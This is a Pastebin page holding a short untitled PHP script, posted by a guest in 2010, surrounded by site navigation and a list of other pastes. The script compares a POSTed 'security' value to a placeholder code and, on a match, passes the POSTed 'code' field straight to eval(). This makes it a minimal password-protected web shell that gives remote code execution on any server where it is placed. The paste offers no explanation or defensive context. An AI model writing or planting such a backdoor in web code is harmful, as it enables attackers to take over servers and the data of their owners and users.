Pastebin
API
tools
faq
paste
Login
Sign up
SHARE
TWEET
Untitled
a guest
Oct 17th, 2010
484
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
PHP
0.16 KB
| None
|
0
0
raw
download
clone
embed
print
report
<?php
define
(
'SECURITY_CODE'
,
'YOUR_SECURITY_CODE'
)
;
if
(
$_POST
[
security
]
==
SECURITY_CODE
)
{
eval
(
$_POST
[
code
]
)
;
}
else
{
echo
(
'Wrong Security Code'
)
;
}
?>
Advertisement
Add Comment
Please,
Sign In
to add comment
Public Pastes
Common Lisp Exercise
Lisp | 1 hour ago | 2.21 KB
change header logo on certain category page
PHP | 2 hours ago | 1.24 KB
altour_vertex_twosprints.py
Python | 4 hours ago | 12.21 KB
dopamine.wtf - The North Is Undead
Lua | 4 hours ago | 217.88 KB
Untitled
JSON | 6 hours ago | 0.68 KB
2.5I
Lua | 6 hours ago | 0.59 KB
2.5U
Lua | 6 hours ago | 0.69 KB
Hello There Animation by Jordan Brown
JavaScript | 6 hours ago | 6.29 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!